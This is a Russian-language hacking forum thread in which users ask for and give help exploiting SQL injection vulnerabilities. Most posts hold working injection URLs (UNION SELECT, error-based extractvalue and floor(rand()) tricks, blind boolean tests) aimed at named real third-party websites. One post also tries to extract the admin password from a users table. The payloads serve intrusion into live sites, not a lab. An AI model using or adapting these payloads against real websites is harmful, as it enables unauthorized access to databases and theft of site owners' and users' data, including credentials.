Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. iProtoss

    iProtoss New Member

    Joined:
    22 Mar 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    нашел активную sql инъекцию однако не получается составить запрос

    INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
    SELECT 28273, tq.quest_id, ta.id, '1970-01-01 03:00:00'
    FROM tmp_answers_28273 as ta, tmp_quest_28273 as tq
    WHERE tq.virtual_id=2 AND ta.virtual_id=12

    UNION INSERT INTO results_temp (start_time) SELECT passwd FROM users WHERE login='admin'

    на первую часть запроса могу влиять очень мало, поэтому требуется использование UNION

    в ответе возвращается ERROR: DB Error: syntax error

    можете что-нить посоветовать?

    юнион требует работы с одинаковым колчеством ячеек даже в случае инсерт??
     
  2. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    что-то вообще ничего понять не могу
    в mysql нельзя писать union insert, если ты об этом
     
  3. Auld

    Auld New Member

    Joined:
    20 Feb 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Попробуй это
    http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

    А вообще, лучше бы ты линк скинул.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ. что ети функции делают я понимаю, непойму почему они заставляют вывоится инфу, кто может обьяснить?
     
  5. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    FLOOR(RAND(0)*2) - Эта функция заставляет скрипт выводить ошибку.
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    не, ну ето я уже знаю
    но вот например так не выводит

    http://sibkulinar.ru/placecooking.php?id=2%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

    а так выводит


    http://sibkulinar.ru/placecooking.php
    ?id=2' and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    почему?
     
  7. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    потому что это блайнд. и в данном случае результат запроса возвращается в ошибке. т.е. для эксплутации нам нужно вызвать ошибку и вывести через неё данные. вот и вся суть error based'a.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    хм... неочень понятно,

    допустим тут разве результат запроса не возвращается в ошибке? ведь тут тоже вызваем ошибку и выводим через неё данные
    +or+1+group+by+concat((select+version()),0x00,floor(rand(0)*2))having+min(0)+or+1--+

    или нет?
     
  9. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    http://www.xakep.ru/post/52222/ - почитай эту статейку, думаю все станет ясно.
     
    1 person likes this.
  10. iProtoss

    iProtoss New Member

    Joined:
    22 Mar 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    *okay.jpg*
    сайт в локалке, зеркала в интернеты вроде бы нету(

    http://test/continue_testing/?action=3&session=2825&answer=12&question=1

    ERROR: DB Error: no such table
    ERROR: DB Error: no such table

    Невозможно выполнить вставку в таблицу результатов
    INSERT INTO results_temp (session_id, quest_id, ans_id, start_time)
    SELECT 2825, tq.quest_id, ta.id, '2012-03-23 12:55:38'
    FROM tmp_answers_2825 as ta, tmp_quest_2825 as tq
    WHERE tq.virtual_id=1 AND ta.virtual_id=12

    2825 - номер сессии берется из адресной строки - и записывается во все места в запросе - 2825, tmp_answers_2825, p_quest_2825
    номер сессии, при которой запрос выполнится тоже известен - 28275
    tq.virtual_id=1 и ta.virtual_id=12 - тоже берется гетом

    возможность просмотреть результат вывода точно есть по ячейке start_time

    проверки входных данных нету (&question=1 AND 1=1 и в таком стиле выполняются)

    есть идеи?
     
    #19910 iProtoss, 23 Mar 2012
    Last edited: 23 Mar 2012
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    помогите разкрутить, чёт невыходит
    http://www.fanfics.ru/read.php?id=3&chapter=-616%27
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Как один из вариантов (Blind):

    http://www.fanfics.ru/read.php?id=45564&chapter=0'and(substring(version(),1,1)=5)and'1 - TRUE
    http://www.fanfics.ru/read.php?id=45564&chapter=0'and(substring(version(),1,1)=4)and'1 - FALSE

    Ну и ErrorBased можно:
    http://www.fanfics.ru/read.php?id=45564&chapter=0'and(extractvalue(1,concat(0x3a,version())))and'
    Справа видим:
     
    #19912 Tigger, 23 Mar 2012
    Last edited: 23 Mar 2012
    2 people like this.
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    выводит Subquery returns more than 1 row
    как сделать чтобы вывело данные?
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А зачем?

    Там можно без ErrorBased обойтись.

    http://www.zoo-friend.ru/?m=292&action=show_item&id=3020'+and+user()=database()+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20a
     
    1 person likes this.
  15. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Покажите пожалуйста сайт для примера на котором есть слепая sql-inj и выведите информпцию к примеру version.Это мне для треннировки надо,чтоб я понял.
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ, подскажите, тут можно както чёнибуть вывести?

    http://venec.ulstu.ru/lib/go.php?id=2151+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Можешь использовать как блинд.
     
    _________________________
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://venec.ulstu.ru/lib/go.php?id=2151-9999999.9+union+select+1,2,3,4,5,6,7,8,9,12313212,11,12,13,14,15,16,17,18,19,20,21,22--+
    Только не вывел ничего(
     
    #19918 Ereee, 24 Mar 2012
    Last edited: 24 Mar 2012
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    блин,
    а тут http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404+limit+0,0+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables--+

    чего таблици не выводит?
     
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+0,1--+d

    Конечно, limit 0,0 сделал.
     
    1 person likes this.
Thread Status:
Not open for further replies.